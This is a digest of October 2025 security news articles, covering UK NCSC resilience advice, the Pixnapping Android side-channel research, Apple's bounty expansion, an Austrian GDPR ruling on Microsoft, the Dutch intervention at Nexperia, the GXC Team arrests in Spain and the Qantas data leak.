Sep 23rd, 2025: MSRC suggests October 15, 2025 disclosure date.

Have plans on paper in case of cyber-attack, firms told

bbc.com
Joe TidyCyber correspondent, BBC World Service

Prepare to switch to offline systems in the event of a cyber-attack, firms are being advised.

People should plan for potential cyber-attacks by going back to pen and paper, according to the latest advice.

The government has written to chief executives across the country strongly recommending that they should have physical copies of their plans at the ready as a precaution.

A recent spate of hacks has highlighted the chaos that can ensue when hackers take computer systems down.

The warning comes as the National Cyber-Security Centre (NCSC) reported an increase in nationally significant attacks this year.

Criminal hacks on Marks and Spencer, The Co-op and Jaguar Land Rover have led to empty shelves and production lines being halted this year as the companies struggled without their computer systems.

Organisations need to "have a plan for how they would continue to operate without their IT, (and rebuild that IT at pace), were an attack to get through," said Richard Horne, chief executive of the NCSC.

Firms are being urged to look beyond cyber-security controls toward a strategy known as "resilience engineering", which focuses on building systems that can anticipate, absorb, recover, and adapt, in the event of an attack.

Plans should be stored in paper form or offline, the agency suggests, and include information about how teams will communicate without work email and other analogue work arounds.

These types of cyber attack contingency plans are not new but it's notable that the UK's cyber authority is putting the advice prominently in its annual review.

Although the total number of hacks that the NCSC dealt with in the first nine months of this year was, at 429, roughly the same as for a similar period last year, there was an increase in hacks with a bigger impact.

The number of "nationally significant" incidents represented nearly half, or 204, of all incidents. Last year only 89 were in that category.

A nationally significant incident covers cyber-attacks in the three highest categories in the NCSC and UK law enforcement categorisation model:

Category 1: National cyber-emergency.
Category 2: Highly significant incident.
Category 3: Significant incident.
Category 4: Substantial incident.
Category 5: Moderate incident.
Category 6: Localised incident.
Amongst this year's incidents, 4% (18) were in the second highest category "highly significant".

This marks a 50% increase in such incidents, an increase for the third consecutive year.

The NCSC would not give details on which attacks, either public or undisclosed, fall into which category.

But, as a benchmark, it is understood that the wave of attacks on UK retailers in the spring, which affected Marks and Spencer, The Co-op and Harrods, would be classed as a Significant incident.

One of the most serious attacks last year, on a blood testing provider, caused major problems for London hospitals. It resulted in significant clinical disruption and directly contributed to at least one patient death.

The NCSC would not say which category this incident would fall into.

The vast majority of attacks are financially motivated with criminal gangs using ransomware or data extortion to blackmail a victim into sending Bitcoins in ransom.

Whilst most cyber-crime gangs are headquartered in Russian or former Soviet countries, there has been a resurgence in teenage hacking gangs thought to be based in English-speaking countries.

So far this year seven teenagers have been arrested in the UK as part of investigations into major cyber-attacks.

As well as the advice over heightened preparations and collaboration, the government is asking organisations to make better use of the free tools and services offered by the NCSC, for example free cyber-insurance for small businesses that have completed the popular Cyber-Essentials programme.

'Basic protection'
Paul Abbott, whose Northamptonshire transport firm KNP closed after hackers encrypted its operational systems and demanded money in 2023, says it's no longer a case of "if" such incidents will happen, but when.

"We were throwing £120,000 a year at [cyber-security] with insurance and systems and third-party managed systems," Mr Abbott told BBC Radio 5 Live on Tuesday.

He said he now focuses on security, education and contingency - key to which involves planning what is needed to keep a business running in the event of an attack or outage.

"The call for pen and paper might sound old-fashioned, but it's practical," said Graeme Stewart, head of public sector at cyber-security firm Check Point, noting digital systems can be rendered "useless" once targeted by hackers.

"You wouldn't walk onto a building site without a helmet - yet companies still go online without basic protection," he added.

"Cybersecurity needs to be treated with the same seriousness as health and safety: not optional, not an afterthought, but part of everyday working life."

Hackers can steal 2FA codes and private messages from Android phones
  • Ars Technica
    Dan Goodin Senior Security Editor
    13 oct. 2025 23:36

Malicious app required to make “Pixnapping” attack work requires no permissions.

Android devices are vulnerable to a new attack that can covertly steal two-factor authentication codes, location timelines, and other private data in less than 30 seconds.

The new attack, named Pixnapping by the team of academic researchers who devised it, requires a victim to first install a malicious app on an Android phone or tablet. The app, which requires no system permissions, can then effectively read data that any other installed app displays on the screen. Pixnapping has been demonstrated on Google Pixel phones and the Samsung Galaxy S25 phone and likely could be modified to work on other models with additional work. Google released mitigations last month, but the researchers said a modified version of the attack works even when the update is installed.

Like taking a screenshot
Pixnapping attacks begin with the malicious app invoking Android programming interfaces that cause the authenticator or other targeted apps to send sensitive information to the device screen. The malicious app then runs graphical operations on individual pixels of interest to the attacker. Pixnapping then exploits a side channel that allows the malicious app to map the pixels at those coordinates to letters, numbers, or shapes.

“Anything that is visible when the target app is opened can be stolen by the malicious app using Pixnapping,” the researchers wrote on an informational website. “Chat messages, 2FA codes, email messages, etc. are all vulnerable since they are visible. If an app has secret information that is not visible (e.g., it has a secret key that is stored but never shown on the screen), that information cannot be stolen by Pixnapping.”

The new attack class is reminiscent of GPU.zip, a 2023 attack that allowed malicious websites to read the usernames, passwords, and other sensitive visual data displayed by other websites. It worked by exploiting side channels found in GPUs from all major suppliers. The vulnerabilities that GPU.zip exploited have never been fixed. Instead, the attack was blocked in browsers by limiting their ability to open iframes, an HTML element that allows one website (in the case of GPU.zip, a malicious one) to embed the contents of a site from a different domain.

Pixnapping targets the same side channel as GPU.zip, specifically the precise amount of time it takes for a given frame to be rendered on the screen.

“This allows a malicious app to steal sensitive information displayed by other apps or arbitrary websites, pixel by pixel,” Alan Linghao Wang, lead author of the research paper “Pixnapping: Bringing Pixel Stealing out of the Stone Age,” explained in an interview. “Conceptually, it is as if the malicious app was taking a screenshot of screen contents it should not have access to. Our end-to-end attacks simply measure the rendering time per frame of the graphical operations… to determine whether the pixel was white or non-white.”

Pixnapping in three steps
The attack occurs in three main steps. In the first, the malicious app invokes Android APIs that make calls to the app the attacker wants to snoop on. These calls can also be used to effectively scan an infected device for installed apps of interest. The calls can further cause the targeted app to display specific data it has access to, such as a message thread in a messaging app or a 2FA code for a specific site. This call causes the information to be sent to the Android rendering pipeline, the system that takes each app’s pixels so they can be rendered on the screen. The Android-specific calls made include activities, intents, and tasks.

In the second step, Pixnapping performs graphical operations on individual pixels that the targeted app sent to the rendering pipeline. These operations choose the coordinates of target pixels the app wants to steal and begin to check if the color of those coordinates is white or non-white or, more generally, if the color is c or non-c (for an arbitrary color c).

“Suppose, for example, [the attacker] wants to steal a pixel that is part of the screen region where a 2FA character is known to be rendered by Google Authenticator,” Wang said. “This pixel is either white (if nothing was rendered there) or non-white (if part of a 2FA digit was rendered there). Then, conceptually, the attacker wants to cause some graphical operations whose rendering time is long if the target victim pixel is non-white and short if it is white. The malicious app does this by opening some malicious activities (i.e., windows) in front of the victim app that was opened in Step 1.”

The third step measures the amount of time required at each coordinate. By combining the times for each one, the attack can rebuild the images sent to the rendering pipeline one pixel at a time.

As Ars reader hotball put it in the comments below:

Basically the attacker renders something transparent in front of the target app, then using a timing attack exploiting the GPU’s graphical data compression to try finding out the color of the pixels. It’s not something as simple as “give me the pixels of another app showing on the screen right now.” That’s why it takes time and can be too slow to fit within the 30 seconds window of the Google Authenticator app.

In an online interview, paper co-author Ricardo Paccagnella described the attack in more detail:

Step 1: The malicious app invokes a target app to cause some sensitive visual content to be rendered.

Step 2: The malicious app uses Android APIs to “draw over” that visual content and cause a side channel (in our case, GPU.zip) to leak as a function of the color of individual pixels rendered in Step 1 (e.g., activate only if the pixel color is c).

Step 3: The malicious app monitors the side effects of Step 2 to infer, e.g., if the color of those pixels was c or not, one pixel at a time.

Steps 2 and 3 can be implemented differently depending on the side channel that the attacker wants to exploit. In our instantiations on Google and Samsung phones, we exploited the GPU.zip side channel. When using GPU.zip, measuring the rendering time per frame was sufficient to determine if the color of each pixel is c or not. Future instantiations of the attack may use other side channels where controlling memory management and accessing fine-grained timers may be necessary (see Section 3.3 of the paper). Pixnapping would still work then: the attacker would just need to change how Steps 2 and 3 are implemented.

The amount of time required to perform the attack depends on several variables, including how many coordinates need to be measured. In some cases, there’s no hard deadline for obtaining the information the attacker wants to steal. In other cases—such as stealing a 2FA code—every second counts, since each one is valid for only 30 seconds. In the paper, the researchers explained:

To meet the strict 30-second deadline for the attack, we also reduce the number of samples per target pixel to 16 (compared to the 34 or 64 used in earlier attacks) and decrease the idle time between pixel leaks from 1.5 seconds to 70 milliseconds. To ensure that the attacker has the full 30 seconds to leak the 2FA code, our implementation waits for the beginning of a new 30-second global time interval, determined using the system clock.

… We use our end-to-end attack to leak 100 different 2FA codes from Google Authenticator on each of our Google Pixel phones. Our attack correctly recovers the full 6-digit 2FA code in 73%, 53%, 29%, and 53% of the trials on the Pixel 6, 7, 8, and 9, respectively. The average time to recover each 2FA code is 14.3, 25.8, 24.9, and 25.3 seconds for the Pixel 6, Pixel 7, Pixel 8, and Pixel 9, respectively. We are unable to leak 2FA codes within 30 seconds using our implementation on the Samsung Galaxy S25 device due to significant noise. We leave further investigation of how to tune our attack to work on this device to future work.

In an email, a Google representative wrote, “We issued a patch for CVE-2025-48561 in the September Android security bulletin, which partially mitigates this behavior. We are issuing an additional patch for this vulnerability in the December Android security bulletin. We have not seen any evidence of in-the-wild exploitation.”

Pixnapping is useful research in that it demonstrates the limitations of Google’s security and privacy assurances that one installed app can’t access data belonging to another app. The challenges in implementing the attack to steal useful data in real-world scenarios, however, are likely to be significant. In an age when teenagers can steal secrets from Fortune 500 companies simply by asking nicely, the utility of more complicated and limited attacks is probably of less value.

A major evolution of Apple Security Bounty, with the industry's top awards for the most advanced research
  • Apple Security Research - October 10, 2025

Since we launched the public Apple Security Bounty program in 2020, we’re proud to have awarded over $35 million to more than 800 security researchers, with multiple individual reports earning $500,000 rewards. We’re grateful to everyone who submitted their research and worked closely with us to help protect our users.

Today we’re announcing the next major chapter for Apple Security Bounty, featuring the industry’s highest rewards, expanded research categories, and a flag system for researchers to objectively demonstrate vulnerabilities and obtain accelerated awards.

We’re doubling our top award to $2 million for exploit chains that can achieve similar goals as sophisticated mercenary spyware attacks. This is an unprecedented amount in the industry and the largest payout offered by any bounty program we’re aware of — and our bonus system, providing additional rewards for Lockdown Mode bypasses and vulnerabilities discovered in beta software, can more than double this reward, with a maximum payout in excess of $5 million. We’re also doubling or significantly increasing rewards in many other categories to encourage more intensive research. This includes $100,000 for a complete Gatekeeper bypass, and $1 million for broad unauthorized iCloud access, as no successful exploit has been demonstrated to date in either category.
Our bounty categories are expanding to cover even more attack surfaces. Notably, we're rewarding one-click WebKit sandbox escapes with up to $300,000, and wireless proximity exploits over any radio with up to $1 million.
We’re introducing Target Flags, a new way for researchers to objectively demonstrate exploitability for some of our top bounty categories, including remote code execution and Transparency, Consent, and Control (TCC) bypasses — and to help determine eligibility for a specific award. Researchers who submit reports with Target Flags will qualify for accelerated awards, which are processed immediately after the research is received and verified, even before a fix becomes available.
These updates will go into effect in November 2025. At that time, we will publish the complete list of new and expanded categories, rewards, and bonuses on the Apple Security Research site, along with detailed instructions for taking advantage of Target Flags, updated program guidelines, and much more.

Since we introduced our bounty program, we have continued to build industry-leading security defenses in our products, including Lockdown Mode, an upgraded security architecture in the Safari browser, and most recently, Memory Integrity Enforcement. These advances represent a significant evolution in Apple platform security, helping make iPhone the most secure consumer device in the world — and they also make it much more challenging and time-consuming for researchers to develop working exploits for vulnerabilities on our platforms.

Meanwhile, the only system-level iOS attacks we observe in the wild come from mercenary spyware — extremely sophisticated exploit chains, historically associated with state actors, that cost millions of dollars to develop and are used against a very small number of targeted individuals. While Lockdown Mode and Memory Integrity Enforcement make such attacks drastically more expensive and difficult to develop, we recognize that the most advanced adversaries will continue to evolve their techniques.

As a result, we’re adapting Apple Security Bounty to encourage highly advanced research on our most critical attack surfaces despite the increased difficulty, and to provide insights that support our mission to protect users of over 2.35 billion active Apple devices worldwide. Our updated program offers outsize rewards for findings that help us stay ahead of real-world threats, significantly prioritizing verifiable exploits over theoretical vulnerabilities, and partial and complete exploit chains over individual exploits.

Greater rewards for complete exploit chains
Mercenary spyware attacks typically chain many vulnerabilities together, cross different security boundaries, and incrementally escalate privileges. Apple’s Security Engineering and Architecture (SEAR) team focuses its offensive research on understanding such exploitation paths to drive foundational improvements to the strength of our defenses, and we want Apple Security Bounty to encourage new perspectives and ideas from the security research community. Here is a preview of how we're increasing rewards for five key attack vectors:

Current Maximum New Maximum

Zero-click chain: Remote attack with no user-interaction $1M $2M
One-click chain: Remote attack with one-click user-interaction $250K $1M
Wireless proximity attack: Attack requiring physical proximity to device $250K $1M
Physical device access: Attack requiring physical access to locked device $250K $500K
App sandbox escape: Attack from app sandbox to SPTM bypass $150K $500K
Top rewards are for exploits that are similar to the most sophisticated, real-world threats, that work on our latest hardware and software, and that use our new Target Flags, which we explain in more detail below. The rewards are determined by the demonstrated outcome, regardless of the specific route through the system. This means that rewards for remote-entry vectors are significantly increasing, and rewards for attack vectors not commonly observed in real-world attacks are decreasing. Individual chain components or multiple components that cannot be linked together will remain eligible for rewards, though these are proportionally smaller to match their relative impact.

Boosting macOS Gatekeeper
Because macOS allows users to install applications from multiple sources, Gatekeeper is our first and most important line of defense against malicious software. Although Gatekeeper has been included in Apple Security Bounty since 2020, we've never received a report demonstrating a complete Gatekeeper bypass with no user interaction. To drive deeper research in this critical area, researchers who report a full Gatekeeper bypass with no user interaction are eligible for a $100,000 award.

Expanded Apple Security Bounty categories
One-click attacks through the web browser remain a critical entry vector for mercenary spyware on all major operating systems, including iOS, Android, and Windows. Our core defense against these threats is deeply robust isolation of WebKit’s WebContent process, and our focused engineering improvements over the past few years — including the GPU Process security architecture and our comprehensive CoreIPC hardening — have eliminated WebContent’s direct access to thousands of external IPC endpoints and removed 100 percent of the IOUserClient attack surface from the WebContent sandbox.

As a result, researchers who demonstrate chaining WebContent code execution with a sandbox escape can receive up to $300,000, and continuing the chain to achieve unsigned code execution with arbitrary entitlements becomes eligible for a $1 million reward. Modern browser renderers are exceptionally complex, which is why rigorous process isolation is so central to our WebKit security strategy. Therefore, WebContent exploits that are not able to break process isolation and escape the sandbox will receive smaller rewards.

We're also expanding our Wireless Proximity category, which includes our latest devices with the Apple-designed C1 and C1X modems and N1 wireless chip. We believe the architectural improvements and enhanced security in these devices make them the most secure in the industry, making proximity-based attacks more challenging to execute than ever. While we've never observed a real-world, zero-click attack executed purely through wireless proximity, we're committed to protecting our users against even the most sophisticated threats. We are therefore expanding our wireless proximity bounty to encompass all radio interfaces in our latest devices, and we are doubling the maximum reward for this category to $1 million.

Introducing Target Flags
In addition to increasing reward amounts and expanding bounty categories, we're making it easier for researchers to objectively demonstrate their findings — and to determine the expected reward for their specific research report. Target Flags, inspired by capture-the-flag competitions, are built into our operating systems and allow us to rapidly review the issue and process a resulting reward, even before we release a fix.

When researchers demonstrate security issues using Target Flags, the specific flag that’s captured objectively demonstrates a given level of capability — for example, register control, arbitrary read/write, or code execution — and directly correlates to the reward amount, making the award determination more transparent than ever. Because Target Flags can be programmatically verified by Apple as part of submitted findings, researchers who submit eligible reports with Target Flags will receive notification of their bounty award immediately upon our validation of the captured flag. Confirmed rewards will be issued in an upcoming payment cycle rather than when a fix becomes available, underscoring the trust we've built with our core researcher community.

Target Flags are supported on all Apple platforms — iOS, iPadOS, macOS, visionOS, watchOS, and tvOS — and cover a number of Apple Security Bounty areas, and coverage will expand over time.

Reward and bonus guidelines
Top rewards in all categories apply only for issues affecting the latest publicly available software and hardware. Our newest devices and operating systems incorporate our most advanced security features, such as Memory Integrity Enforcement in the iPhone 17 lineup, making research against current hardware significantly more valuable for our defensive efforts.

We continue to offer bonus rewards for exceptional research. Reports on issues in current developer or public beta releases qualify for substantial bonuses, as they give us a chance to fix the problem before the software is ever released to our users. And we continue to award significant bonuses for exploit chain components that bypass specific Lockdown Mode protections.

Finally, each year we receive a number of issues outside of Apple Security Bounty categories which we assess to be of low impact to real-world user security, but which we nonetheless address with software fixes out of an abundance of caution. Often times, these issues are some of the first reports we receive from researchers new to our platforms. We want those researchers to have an encouraging experience — so in addition to CVE assignment and researcher credit as before, we will now also reward such reports with a $1,000 award. We have been piloting these awards for some time and are pleased to make them a permanent part of our expanded reward portfolio.

Special initiatives for 2026
In 2022, we made an unprecedented $10 million cybersecurity grant in support of civil society organizations that investigate highly targeted mercenary spyware attacks. Now, we are planning a special initiative featuring iPhone 17 with Memory Integrity Enforcement, which we believe is the most significant upgrade to memory safety in the history of consumer operating systems. To rapidly make this revolutionary, industry-leading defense available to members of civil society who may be targeted by mercenary spyware, we will provide a thousand iPhone 17 devices to civil society organizations who can get them into the hands of at-risk users. This initiative reflects our continued commitment to make our most advanced security protections reach those who need them most.

Additionally, the 2026 Security Research Device Program now includes iPhone 17 devices with our latest security advances, including Memory Integrity Enforcement, and is available to applicants with proven security research track records on any platform. Researchers seeking to accelerate their iOS research can apply for the 2026 program by October 31, 2025. All vulnerabilities discovered using the Security Research Device receive priority consideration for Apple Security Bounty rewards and bonuses.

In closing
We’re updating Apple Security Bounty to encourage researchers to examine the most critical attack surfaces on our platforms and services, and to help drive the highest impact security discoveries. As we continue to raise our research standards, we are also dramatically increasing rewards — our highest award will be $2 million before bonus considerations.

Until the updated awards are published online, we will evaluate all new reports against our previous framework as well as the new one, and we'll award the higher amount. And while we’re especially motivated to receive complex exploit chains and innovative research, we’ll continue to review and reward all reports that significantly impact the security of our users, even if they're not covered by our published categories. We look forward to continuing to work with you to help keep our users safe!

Microsoft violated EU law in handling of kids’ data, Austrian privacy regulator finds | The Record from Recorded Future News

therecord.media Suzanne Smalley
October 10th, 2025

Austria's data protection authority on Wednesday ruled that Microsoft illegally tracked students using its education software by failing to give them access to their data and using cookies without consent.

The decision from Austria’s Datenschutzbehörde (DSB) came in response to a 2024 complaint lodged by the Austrian privacy advocacy group noyb, which accused the tech giant of violating Europe’s General Data Privacy Regulation for its handling of children’s data.

The complainant in the case, the father of a minor whose school uses the software, said he did not consent to the cookies and could not get information about how his child’s data was being used.

Microsoft 365 Education is used by school districts to manage technology, allow collaboration and store data in the cloud. It includes Office applications like Word, Excel, Outlook and PowerPoint as well as security tools and collaboration platforms like Teams.

"The decision highlights the lack of transparency in Microsoft 365 Education," Felix Mikolasch, a data protection lawyer at Noyb, said Friday in a prepared statement. "It is nearly impossible for schools to inform students, parents and teachers about what is happening with their data."

A spokesperson for Microsoft said in a prepared statement that the company will review the decision.

“Microsoft 365 for Education meets all required data protection standards and institutions in the education sector can continue to use it in compliance with GDPR,” the statement said.

The regulator has ordered Microsoft to give the complainant access to their data and to begin to explain more clearly how it uses data it collects.

Minister of Economic Affairs invokes Goods Availability Act | News item | Government.nl

government.nl

On Tuesday, 30 September 2025, the Dutch Minister of Economic Affairs invoked the Goods Availability Act (Wet beschikbaarheid goederen) due to serious governance shortcomings at semiconductor manufacturer Nexperia. The company’s headquarters are located in Nijmegen, with additional subsidiaries in various countries around the world. The decision aims to prevent a situation in which the goods produced by Nexperia (finished and semi-finished products) would become unavailable in an emergency. The company’s regular production process can continue.

Reason for intervention under the Goods Availability Act
The Act has been invoked following recent and acute signals of serious governance shortcomings and actions within Nexperia. These signals posed a threat to the continuity and safeguarding on Dutch and European soil of crucial technological knowledge and capabilities. Losing these capabilities could pose a risk to Dutch and European economic security. Nexperia produces, among other things, chips used in the European automotive industry and in consumer electronics.

This measure is intended to mitigate that risk. On de basis of the order, company decisions may be blocked or reversed by the minister of Economic Affairs if they are (potentially) harmful to the interests of the company, to its future as a Dutch and European enterprise, and/or to the preservation of this critical value chain for Europe. The company’s regular production process can continue.

Invoking the Goods Availability Act by the Minister is highly exceptional. Only due to the significant scale and urgency of the governance deficiencies at Nexperia has the decision been made to apply the Act. This is a measure the government uses only when absolutely necessary. The application of this Act in this case is solely intended to prevent governance shortcomings at the specific company concerned and is not directed at other companies, the sector, or other countries. Parties may lodge an objection to this decision before the courts.

Spain dismantles “GXC Team” cybercrime syndicate, arrests leader

bleepingcomputer.com
By Bill Toulas
October 11, 2025

Spanish Guardia Civil have dismantled the “GXC Team” cybercrime operation and arrested its alleged leader, a 25-year-old Brazilian known as “GoogleXcoder.”

The GXC Team operated a crime-as-a-service (CaaS) platform offering AI-powered phishing kits, Android malware, and voice-scam tools via Telegram and a Russian-speaking hacker forum.

“The Civil Guard has dismantled one of the most active criminal organizations in the field of phishing in Spain, with the arrest of a 25-year-old Brazilian young man considered the main provider of tools for the massive theft of credentials in the Spanish-speaking environment,” announced Guardia Civil.

Group-IB has been tracking the operation and says that GXC Team was targeting banks, transport, and e-commerce entities in Spain, Slovakia, the UK, the US, and Brazil.

The phishing kits replicated the websites of tens of Spanish and international institutions, and powered at least 250 phishing sites.

The threat group also developed at least nine Android malware strains that intercepted SMS and one-time passwords (OTPs), useful for hijacking accounts and validating fraudulent transactions.

GXC Team also offered complete technical support and campaign customization services to its clients, acting as a pro-grade and high-yielding crime platform.

A police operation conducted on May 20, involved coordinated raids across Cantabria, Valladolid, Zaragoza, Barcelona, Palma de Mallorca, San Fernando, and La Línea de la Concepción.

During these actions, the authorities seized electronic devices containing phishing kit source code, communications with clients, and financial records.

Law enforcement agents recovered cryptocurrency stolen from victims and shut down Telegram channels used to promote the scams. One of these channels was named “Steal everything from grandmothers.”

The authorities stated that the nationwide raids were made possible thanks to the analysis of the seized devices and cryptocurrency transactions of GoogleXcoder, who was arrested more than a year ago.

“The forensic analysis of the seized devices, as well as the cryptocurrency transactions, which lasted for more than a year due to their complexity, made it possible to reconstruct the entire criminal network, managing to identify six people directly related to the use of these services,” explained Guardia Civil.

The investigation into the GXC Team is still ongoing, and Spanish authorities have mentioned the possibility of further actions leading to the arrest of more members of the cybercrime ring.

Qantas says customer data released by cyber criminals months after cyber breach

By Reuters
October 12, 20258:23 AM GMT+2Updated October 12, 2025

SYDNEY, Oct 12 (Reuters) - Australia's Qantas Airways said on Sunday that it was one of the companies whose customer data had been published by cybercriminals after it was stolen by a hacker in a July breach of a database containing the personal information of the airline's customers.
The airline said in July that more than a million customers had sensitive details such as phone numbers, birth dates or home addresses accessed in one of Australia's biggest cyber breaches in years. Another four million customers had just their name and email address taken during the hack, it said at the time.

The July breach represented Australia's most high-profile cyberattack since telecommunications giant Optus and health insurer Medibank were hit in 2022, incidents that prompted mandatory cyber resilience laws.
On Sunday, Qantas said in a statement that it was "one of a number of companies globally that has had data released by cyber criminals following the airline’s cyber incident in early July, where customer data was stolen via a third party platform".
"With the help of specialist cyber security experts, we are investigating what data was part of the release," it said.
"We have an ongoing injunction in place to prevent the stolen data being accessed, viewed, released, used, transmitted or published by anyone, including third parties," the airline added.
Hacker collective Scattered Lapsus$ Hunters is behind the Qantas data release, which occurred after a ransom deadline set by the group passed, the Guardian Australia news site reported.
Qantas declined to comment on the report.